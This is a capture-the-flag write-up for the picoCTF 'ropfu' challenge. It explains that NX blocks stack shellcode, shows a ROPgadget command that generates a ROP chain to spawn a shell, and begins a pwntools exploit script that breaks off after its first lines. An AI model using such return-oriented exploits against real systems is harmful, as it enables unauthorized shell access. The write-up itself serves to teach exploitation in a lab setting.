
# ropfu

## Description
What's ROP?
Can you exploit the following [program](https://artifacts.picoctf.net/c/271/vuln) to get the flag? [Download source](https://artifacts.picoctf.net/c/271/vuln.c).
`nc saturn.picoctf.net 50985`

## Solution

As the hint says, this is a classic ROP challenge.
Running *checksec* shows that NX is enabled, so the stack is not executable: we can't place shellcode on the stack and run it.
Instead, we need to build a ROP chain that uses a syscall to get a shell.

Luckily, there is a tool that can help with that: ROPgadget.
```
ROPgadget --binary ./vuln --ropchain
```
This tool gives us the payload we need.
And here is the final program:

```
#python2.7

from pwn import *
from struct import pack
p='a'*28
p += pack('